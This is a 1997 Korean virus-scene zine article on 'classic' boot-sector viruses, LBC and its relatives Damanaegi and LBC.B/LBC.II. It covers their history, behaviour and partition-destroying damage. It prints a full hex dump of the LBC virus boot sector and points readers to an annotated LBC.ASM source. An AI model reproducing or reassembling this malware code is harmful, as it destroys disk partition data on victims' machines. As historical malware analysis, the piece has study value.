
 고전 바이러스 탐험 :  LBC virus 와 그 가족들                   CVC #02  97/09

----------------------------------------------------------------------> Osiris

  게임에도 고전명작이 있듯이 바이러스에도 고전명작이 있다는 생각으로 시작하
게 되었다. 고전 바이러스들은 과거에 유명했던 바이러스들을 소개 하고 분석하는
란이다.


 1. LBC

  처음으로 소개 되는 바이러스는 유명한 LBC 바이러스로 89년에 나타나 많은 사
용자들을 공포에 떨게 만들었다.

  Brain 바이러스를 개량한 것으로 알려져 있다. 하지만, 외국자료에는 마치 Sto
ned 바이러스와 관련 된것 처럼 소개 되고 있다.

  LBC 바이러스가 위험했던 이유는 하드 디스크의 파티션 정보를 파괴해서 하드
디스크를 인식못하게 만들었기 때문이다.

  이유는 간단하다. 하드 디스크의 파티션 정보를 찾을 수 없기 때문이다. 이때
문에 플로피로 부팅해도 하드 디스크로 접근을 못해서 마치 하드디크스가 없는
것처럼 나온다. 때문에 많은 사용자들이 하드 디스크를 복구 하지 못하고 하드
디스크를 포맷하거나 새로 구입하는 일이 생겼다.

  소스는 같이 포함된 LBC.ASM 을 참고하면 알 수 있다.
  주석을 달아준 KOV 님께 감사 드린다.


0100  FA EB 05 90 34 12 45 68-33 C0 8E D8 8E D0 BC F0   ....4.Eh3.......
0110  FF FB BB 13 04 8B 07 48-48 89 07 B1 06 D3 E0 8E   .......HH.......
0120  C0 BE 00 7C BF 00 01 B9-00 02 FC F3 A4 06 B8 33   ...|...........3
0130  01 50 CB BB 4C 00 8B 0F-8B 57 02 B8 84 01 89 07   .P..L....W......
0140  8C C8 89 47 02 8E D8 89-0E 78 01 89 16 7A 01 C6   ...G.....x...z..
0150  06 7D 01 02 C6 06 7E 01-00 C7 06 80 01 03 00 C6   .}....~.........
0160  06 7F 01 01 33 C0 50 8E-C0 B8 00 7C 50 A3 82 01   ....3.P....|P...
0170  E8 93 00 73 02 CD 18 CB-59 EC 00 F0 05 03 00 00   ...s....Y.......
0180  01 00 00 01 FB 80 FC 02-75 75 80 FA 01 7F 70 2E   ........uu....p.
0190  FE 0E 7C 01 75 69 2E C6-06 7C 01 05 50 53 51 52   ..|.ui...|..PSQR
01A0  06 1E 0E 1F 88 16 7E 01-C6 06 7F 01 00 C7 06 80   ......~.........
01B0  01 01 00 C7 06 82 01 00-04 C6 06 7D 01 02 E8 43   ...........}...C
01C0  00 72 36 A1 06 01 BB 06-04 3B 07 75 03 EB 2A 90   .r6......;.u..*.
01D0  C6 06 7D 01 03 C6 06 7F-01 01 C7 06 80 01 03 00   ..}.............
01E0  E8 21 00 72 14 C6 06 7F-01 00 C7 06 80 01 01 00   .!.r............
01F0  C7 06 82 01 00 01 E8 0B-00 1F 07 5A 59 5B 58 2E   ...........ZY[X.
0200  FF 2E 78 01 0E 07 B9 04-00 51 8A 26 7D 01 B0 01   ..x......Q.&}...
0210  8B 1E 82 01 8B 0E 80 01-8A 36 7F 01 8A 16 7E 01   .........6....~.
0220  9C FF 1E 78 01 73 0E B4-00 9C FF 1E 78 01 59 E2   ...x.s......x.Y.
0230  D8 F9 EB 02 90 59 C3 20-76 69 72 75 73 20 70 72   .....Y. virse pr
0240  6F 67 72 61 6D 20 20 20-6D 65 73 73 67 65 20 4E   ogram   messge N
0250  6A 68 20 74 6F 20 4C 62-63 20 00 00 00 00 00 00   jh to Lbc ......
0260  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
0270  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
0280  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
0290  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
02A0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
02B0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
02C0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
02D0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
02E0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
02F0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................

 2. Damanaegi

  플로피 디스크만 감염되는 바이러스로 BPB 내용은 360 KB 것으로 가지고 있으
므로 1.2 MB 이상의 디스크에 감염되면 파일 구조가 엉망이 된다.
  90년대 초반 까지 많이 발견된 부트 바이러스중 하나이다.
  거의 LBC 바이러스와 유사 하다. 단지 인터럽트 13h 가 불릴때 마다 카운터를
감소 시켜서 메시지를 출력하는 부분이 추가 되고 드라이브 검사 부분이 개선되
었을 뿐이다.

  외산 AV 에서는 NJH-LBC.C 로 진단된다.

  그리고, 열받게 양파를 다마네기 라고 표기한건 상당히 기분 나쁜다. 양파라
는 좋은 말이 있는데 왜 하필 다마네기 인가 ? 그렇게 일본말을 사용해야만 할
까 ? 철부지 한국친구가 공개된 LBC 소스로 약간 변형한것으로 보인다.


 3. LBC.B & LBC.II

  이 두 바이러스는 정보를 얻을 수 없는 관계로 여기서는 생략했다. LBC.B 바
이러스는 LBC 바이러스를 변형 한것으로 예상되며 LBC.II 바이러스는 360 KB
디스크만 감염시키는 변종으로 알려져 있다.


